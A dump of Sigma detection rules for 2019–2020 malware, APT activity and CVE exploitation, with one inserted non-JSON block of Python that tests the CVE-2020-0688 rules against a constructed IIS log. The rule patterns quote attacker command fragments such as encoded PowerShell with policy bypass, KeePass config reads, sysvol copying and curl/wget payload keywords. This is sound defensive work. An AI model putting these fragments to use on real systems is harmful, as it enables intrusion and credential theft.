    "content": "title: Ursnif Malware C2 URL Pattern\nid: 932ac737-33ca-4afd-9869-0d48b391fcc9\nstatus: stable\ndescription: Detects Ursnif C2 traffic.\nreferences:\n    - https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\nauthor: Thomas Patzke\ndate: 2019-12-19\nmodified: 2021-08-09\ntags:\n    - attack.initial-access\n    - attack.t1566.001\n    - attack.execution\n    - attack.t1204.002\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    b64encoding:\n        c-uri|contains:\n            - '_2f'\n            - '_2b'\n    urlpatterns:\n        c-uri|contains|all:\n            - '.avi'\n            - '/images/'\n    condition: b64encoding and urlpatterns\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ursnif/proxy_malware_ursnif_download_url.yml",
    "content": "title: Ursnif Malware Download URL Pattern\nid: a36ce77e-30db-4ea0-8795-644d7af5dfb4\nstatus: stable\ndescription: Detects download of Ursnif malware done by dropper documents.\nreferences:\n    - https://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware\nauthor: Thomas Patzke\ndate: 2019-12-19\nmodified: 2022-08-15\nlogsource:\n    category: proxy\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\ndetection:\n    selection:\n        c-uri|contains|all:\n            - '/'\n            - '.php\\?l='\n        c-uri|endswith: '.cab'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ursnif/registry_add_malware_ursnif.yml",
    "content": "title: Potential Ursnif Malware Activity - Registry\nid: 21f17060-b282-4249-ade0-589ea3591558\nstatus: test\ndescription: Detects registry keys related to Ursnif malware.\nreferences:\n    - https://blog.yoroi.company/research/ursnif-long-live-the-steganography/\n    - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/\nauthor: megan201296\ndate: 2019-02-13\nmodified: 2025-10-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml",
    "content": "title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32\nid: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0\nstatus: test\ndescription: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local\nreferences:\n    - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg\nauthor: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-02\nmodified: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'regsvr32'\n            - '\\AppData\\Local\\'\n            - '.dll'\n            - ',DllEntry'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml",
    "content": "title: APT31 Judgement Panda Activity\nid: 03e2746e-2b31-42f1-ab7a-eb39365b2422\nstatus: test\ndescription: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-21\nmodified: 2023-03-10\ntags:\n    - attack.collection\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.g0128\n    - attack.t1003.001\n    - attack.t1560.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ldifde:\n        CommandLine|contains|all:\n            - 'ldifde'\n            - '-f -n'\n            - 'eprod.ldf'\n    selection_lateral_movement:\n        CommandLine|contains|all:\n            - 'copy \\\\\\\\'\n            - 'c$'\n        CommandLine|contains:\n            - '\\aaaa\\procdump64.exe'\n            - '\\aaaa\\netsess.exe'\n            - '\\aaaa\\7za.exe'\n            - '\\c$\\aaaa\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/APT40/proxy_apt_apt40_dropbox_tool_ua.yml",
    "content": "title: APT40 Dropbox Tool User Agent\nid: 5ba715b6-71b7-44fd-8245-f66893e81b3d\nstatus: test\ndescription: Detects suspicious user agent string of APT40 Dropbox tool\nreferences:\n    - Internal research from Florian Roth\nauthor: Thomas Patzke\ndate: 2019-11-12\nmodified: 2023-05-18\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.exfiltration\n    - attack.t1567.002\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'\n        cs-host: 'api.dropbox.com'\n    condition: selection\nfalsepositives:\n    - Old browsers\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml",
    "content": "title: Potential Russian APT Credential Theft Activity\nid: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee\nstatus: stable\ndescription: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-21\nmodified: 2023-03-08\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - attack.t1003.003\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_xcopy:\n        CommandLine|contains|all:\n            - 'xcopy /S /E /C /Q /H \\\\\\\\'\n            - '\\sysvol\\'\n    selection_adexplorer:\n        CommandLine|contains|all:\n            - 'adexplorer -snapshot \"\" c:\\users\\'\n            - '\\downloads\\'\n            - '.snp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml",
    "content": "title: Potential EmpireMonkey Activity\nid: 10152a7b-b566-438f-a33c-390b607d1c8d\nstatus: test\ndescription: Detects potential EmpireMonkey APT activity\nreferences:\n    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/\n    - https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-04-02\nmodified: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '/e:jscript' # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine\n            - '\\Local\\Temp\\Errors.bat'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml",
    "content": "title: Equation Group DLL_U Export Function Load\nid: d465d1d8-27a2-4cca-9621-a800f37cf72e\nstatus: stable\ndescription: Detects a specific export function name used by one of EquationGroup tools\nreferences:\n    - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=\n    - https://twitter.com/cyb3rops/status/972186477512839170\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-03-04\nmodified: 2023-03-09\ntags:\n    - attack.g0020\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: '-export dll_u'\n        - CommandLine|endswith:\n              - ',dll_u'\n              - ' dll_u'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml",
    "content": "title: Mustang Panda Dropper\nid: 2d87d610-d760-45ee-a7e6-7a6f2a65de00\nstatus: test\ndescription: Detects specific process parameters as used by Mustang Panda droppers\nreferences:\n    - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/\n    - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/\n    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2019-10-30\nmodified: 2021-11-27\ntags:\n    - attack.t1587.001\n    - attack.resource-development\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli:\n        - CommandLine|contains:\n              - 'Temp\\wtask.exe /create'\n              - '%windir:~-3,1%%PUBLIC:~-9,1%'\n              - '/tn \"Security Script '\n              - '%windir:~-1,1%'\n        - CommandLine|contains|all:\n              - '/E:vbscript'\n              - 'C:\\Users\\'\n              - '.txt'\n              - '/F'\n    selection_img:\n        Image|endswith: 'Temp\\winwsh.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Operation-Wocao/README.md",
    "content": "# Operation Wocao\n\n## Summary\n\nOperation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group.\n\nYou can find more information on the threat in the following articles:\n\n- [Operation Wocao Shining a light on one of China’s hidden hacking groups](https://web.archive.org/web/20200215212348/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf)\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml",
    "content": "title: Operation Wocao Activity\nid: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab\nrelated:\n    - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d\n      type: derived\nstatus: test\ndescription: Detects activity mentioned in Operation Wocao report\nreferences:\n    - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\n    - https://twitter.com/SBousseaden/status/1207671369963646976\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2019-12-20\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.discovery\n    - attack.t1012\n    - attack.defense-evasion\n    - attack.t1036.004\n    - attack.t1027\n    - attack.execution\n    - attack.t1053.005\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'checkadmin.exe 127.0.0.1 -all'\n            - 'netsh advfirewall firewall add rule name=powershell dir=in'\n            - 'cmd /c powershell.exe -ep bypass -file c:\\s.ps1'\n            - '/tn win32times /f'\n            - 'create win32times binPath='\n            - '\\c$\\windows\\system32\\devmgr.dll'\n            - ' -exec bypass -enc JgAg'\n            - 'type *keepass\\KeePass.config.xml'\n            - 'iie.exe iie.txt'\n            - 'reg query HKEY_CURRENT_USER\\Software\\\\*\\PuTTY\\Sessions\\'\n    condition: selection\nfalsepositives:\n    - Administrators that use checkadmin.exe tool to enumerate local administrators\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml",
    "content": "title: Operation Wocao Activity - Security\nid: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d\nstatus: test\ndescription: Detects activity mentioned in Operation Wocao report\nreferences:\n    - https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\n    - https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf\n    - https://twitter.com/SBousseaden/status/1207671369963646976\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2019-12-20\nmodified: 2022-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.discovery\n    - attack.t1012\n    - attack.defense-evasion\n    - attack.t1036.004\n    - attack.t1027\n    - attack.execution\n    - attack.t1053.005\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4799\n        TargetUserName|startswith: 'Administr'\n        CallerProcessName|endswith: '\\checkadmin.exe'\n    condition: selection\nfalsepositives:\n    - Administrators that use checkadmin.exe tool to enumerate local administrators\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-0688/web_cve_2020_0688_exchange_exploit.yml",
    "content": "title: CVE-2020-0688 Exploitation Attempt\nid: 7c64e577-d72e-4c3d-9d75-8de6d1f9146a\nstatus: test\ndescription: Detects CVE-2020-0688 Exploitation attempts\nreferences:\n    - https://github.com/Ridter/cve-2020-0688\nauthor: NVISO\ndate: 2020-02-27\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-0688\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains|all:\n            - '/ecp/default.aspx'\n            - '__VIEWSTATEGENERATOR='\n            - '__VIEWSTATE='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-0688/web_cve_2020_0688_msexchange.yml",
    "content": "title: CVE-2020-0688 Exchange Exploitation via Web Log\nid: fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5\nstatus: test\ndescription: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688\nreferences:\n    - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-02-29\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-0688\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-method: 'GET'\n        cs-uri-query|contains:\n            - '/ecp/'\n            - '/owa/'\n    selection2:\n        cs-uri-query|contains: '__VIEWSTATE='\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
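The two CVE-2020-0688 web rules above match on `cs-uri-query`, yet they look for path fragments such as `/ecp/default.aspx` and `/owa/` in it. IIS itself writes the path to `cs-uri-stem` and only the query string to `cs-uri-query`, so the rules expect the field to carry the whole request URI, as a SIEM-normalised URL field normally does. The following Python is an added example, not code from the Sigma project or the rules' authors: it parses a constructed IIS W3C extended log excerpt, joins stem and query into one URI (that join is the field-mapping assumption just described) and applies both rules' logic. The log lines, hosts, user names and query values are placeholders made up for the example.

```python
# Constructed IIS W3C extended log excerpt with the default field set (placeholder traffic, not captured data).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2020-02-29 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-02-29 10:00:01 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=PLACEHOLDER&__VIEWSTATE=PLACEHOLDER 443 EXAMPLE\\user 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 500 0 0 120
2020-02-29 10:00:02 10.0.0.5 GET /owa/auth/logon.aspx url=https%3A%2F%2Fmail.example.com%2Fowa%2F&reason=0 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 15
2020-02-29 10:00:03 10.0.0.5 POST /ecp/default.aspx - 443 EXAMPLE\\admin 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 40
2020-02-29 10:00:04 10.0.0.5 GET /owa/ __VIEWSTATE=PLACEHOLDER 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 302 0 0 10
"""


def parse_w3c(text: str) -> list:
    """Parse W3C extended format: '#Fields:' names the columns, other '#' lines are directives,
    '-' stands for an empty value, and IIS writes spaces inside a value as '+', so splitting on
    whitespace is safe."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
        elif line.startswith("#") or not line.strip():
            continue
        else:
            if fields is None:
                raise ValueError("log data before a #Fields directive")
            values = line.split()
            if len(values) != len(fields):
                raise ValueError(f"expected {len(fields)} columns, got {len(values)}: {line!r}")
            records.append(dict(zip(fields, values)))
    return records


def request_uri(rec: dict) -> str:
    """Stem plus query string, lower-cased for Sigma's case-insensitive matching.
    Assumption: the rules' cs-uri-query field holds the whole request URI, not only the query."""
    stem, query = rec["cs-uri-stem"], rec["cs-uri-query"]
    return (stem if query == "-" else f"{stem}?{query}").lower()


def cve_2020_0688_exploit(rec: dict) -> bool:
    """Rule 7c64e577: cs-uri-query|contains|all of the three fragments."""
    uri = request_uri(rec)
    return all(f in uri for f in ("/ecp/default.aspx", "__viewstategenerator=", "__viewstate="))


def cve_2020_0688_msexchange(rec: dict) -> bool:
    """Rule fce2c2e2: a GET under /ecp/ or /owa/ whose URI carries a __VIEWSTATE parameter."""
    uri = request_uri(rec)
    return (rec["cs-method"].lower() == "get"
            and any(p in uri for p in ("/ecp/", "/owa/"))
            and "__viewstate=" in uri)


def run(text: str = SAMPLE_LOG) -> dict:
    """Record indices each rule fires on."""
    records = parse_w3c(text)
    return {
        "cve_2020_0688_exploit": [i for i, r in enumerate(records) if cve_2020_0688_exploit(r)],
        "cve_2020_0688_msexchange": [i for i, r in enumerate(records) if cve_2020_0688_msexchange(r)],
    }


if __name__ == "__main__":
    print(run())  # {'cve_2020_0688_exploit': [0], 'cve_2020_0688_msexchange': [0, 3]}
```

Record 3 (a GET to `/owa/` with only `__VIEWSTATE=` in the query) shows the difference in scope: the first rule needs all three fragments, the second fires on any GET under `/ecp/` or `/owa/` that carries a `__VIEWSTATE` parameter. If your pipeline keeps `cs-uri-stem` and `cs-uri-query` as separate fields, neither rule can ever match as written, because the path fragments are never present in the query field; check the mapping before trusting a silent rule.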
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml",
    "content": "title: CVE-2020-0688 Exploitation via Eventlog\nid: d6266bf5-935e-4661-b477-78772735a7cb\nstatus: test\ndescription: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688\nreferences:\n    - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/\n    - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2020-02-29\nmodified: 2022-12-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-0688\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection1:\n        EventID: 4\n        Provider_Name: 'MSExchange Control Panel'\n        Level: Error\n    selection2:\n        - '&__VIEWSTATE='\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-10148/web_cve_2020_10148_solarwinds_exploit.yml",
    "content": "title: CVE-2020-10148 SolarWinds Orion API Auth Bypass\nid: 5a35116f-43bc-4901-b62d-ef131f42a9af\nstatus: test\ndescription: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts\nreferences:\n    - https://kb.cert.org/vuls/id/843464\nauthor: Bhabesh Raj, Tim Shelton\ndate: 2020-12-27\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-10148\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/WebResource.axd'\n            - '/ScriptResource.axd'\n            - '/i18n.ashx'\n            - '/Skipi18n'\n    selection2:\n        cs-uri-query|contains:\n            - '/SolarWinds/'\n            - '/api/'\n    valid_request_1:\n        cs-uri-query|contains: 'Orion/Skipi18n/Profiler/'\n    valid_request_2:\n        cs-uri-query|contains:\n            - 'css.i18n.ashx'\n            - 'js.i18n.ashx'\n    condition: all of selection* and not 1 of valid_request_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml",
    "content": "title: Exploited CVE-2020-10189 Zoho ManageEngine\nid: 846b866e-2a57-46ee-8e16-85fa92759be7\nstatus: test\ndescription: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\n    - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-03-25\nmodified: 2023-01-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.s0190\n    - cve.2020-10189\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: 'DesktopCentral_Server\\jre\\bin\\java.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\bitsadmin.exe'\n            - '\\systeminfo.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\reg.exe'\n            - '\\query.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml",
    "content": "title: Suspicious PrinterPorts Creation (CVE-2020-1048)\nid: cc08d590-8b90-413a-aff6-31d1a99678d7\nstatus: test\ndescription: Detects commands that add a new printer port pointing to a suspicious file\nreferences:\n    - https://windows-internals.com/printdemon-cve-2020-1048/\nauthor: EagleEye Team, Florian Roth\ndate: 2020-05-13\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1059.001\n    - cve.2020-1048\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: 'Add-PrinterPort -Name'\n    selection2:\n        CommandLine|contains:\n            - '.exe'\n            - '.dll'\n            - '.bat'\n    selection3:\n        CommandLine|contains: 'Generic / Text Only'\n    condition: (selection1 and selection2) or selection3\nfalsepositives:\n    - New printer port install on host\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1048/registry_set_exploit_cve_2020_1048_new_printer_port.yml",
    "content": "title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry\nid: 7ec912f2-5175-4868-b811-ec13ad0f8567\nstatus: test\ndescription: |\n    Detects changes to the \"Ports\" registry key with data that includes a Windows path or a file with a suspicious extension.\n    This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.\nreferences:\n    - https://windows-internals.com/printdemon-cve-2020-1048/\nauthor: EagleEye Team, Florian Roth (Nextron Systems), NVISO\ndate: 2020-05-13\nmodified: 2024-03-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1112\n    - cve.2020-1048\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows NT\\CurrentVersion\\Ports'\n        Details|contains:\n            - '.bat'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - 'C:'\n    condition: selection\nfalsepositives:\n    - New printer port install on host\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml",
    "content": "title: DNS RCE CVE-2020-1350\nid: b5281f31-f9cc-4d0d-95d0-45b91c45b487\nstatus: test\ndescription: Detects exploitation of the DNS RCE bug reported as CVE-2020-1350 via suspicious child processes of the Windows DNS service (dns.exe)\nreferences:\n    - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/\n    - https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-15\nmodified: 2022-07-12\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1569.002\n    - cve.2020-1350\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\System32\\dns.exe'\n    filter:\n        Image|endswith:\n            - '\\System32\\werfault.exe'\n            - '\\System32\\conhost.exe'\n            - '\\System32\\dnscmd.exe'\n            - '\\System32\\dns.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown but benign sub processes of the Windows DNS service dns.exe\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-1472/proc_creation_win_exploit_cve_2020_1472_zero_poc.yml",
    "content": "title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC\nid: dcc6a01e-9471-44a0-a699-71ea96f8ed8b\nstatus: test\ndescription: Detects the execution of the commonly used ZeroLogon PoC executable.\nreferences:\n    - https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: '@Kostastsale, TheDFIRReport'\ndate: 2022-02-12\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1210\n    - cve.2020-1472\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_main:\n        ParentImage|endswith: '\\cmd.exe'\n        Image|endswith:\n            - '\\cool.exe'\n            - '\\zero.exe'\n        CommandLine|contains|all:\n            - 'Administrator'\n            - '-c'\n    selection_payloads_1:\n        CommandLine|contains|all:\n            - 'taskkill'\n            - '/f'\n            - '/im'\n    selection_payloads_2:\n        CommandLine|contains: 'powershell'\n    condition: selection_main and 1 of selection_payloads_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-14882/web_cve_2020_14882_weblogic_exploit.yml",
    "content": "title: Oracle WebLogic Exploit CVE-2020-14882\nid: 85d466b0-d74c-4514-84d3-2bdd3327588b\nstatus: test\ndescription: Detects exploitation attempts on WebLogic servers\nreferences:\n    - https://isc.sans.edu/diary/26734\n    - https://twitter.com/jas502n/status/1321416053050667009?s=20\n    - https://twitter.com/sudo_sudoka/status/1323951871078223874\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-11-02\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2020-14882\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/console/images/%252E%252E%252Fconsole.portal'\n            - '/console/css/%2e'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-28188/web_cve_2020_28188_terramaster_rce_exploit.yml",
    "content": "title: TerraMaster TOS CVE-2020-28188\nid: 15c312b9-00d0-4feb-8870-7d940a4bdc5e\nstatus: test\ndescription: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188\nreferences:\n    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n    - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\nauthor: Bhabesh Raj\ndate: 2021-01-25\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2020-28188\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    base_url:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/include/makecvs.php'\n            - '?Event='\n    payload:\n        cs-uri-query|contains:\n            - 'curl'\n            - 'wget'\n            - '.py'\n            - '.sh'\n            - 'chmod'\n            - '_GET'\n    condition: base_url and payload\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-3452/web_cve_2020_3452_cisco_asa_ftd.yml",
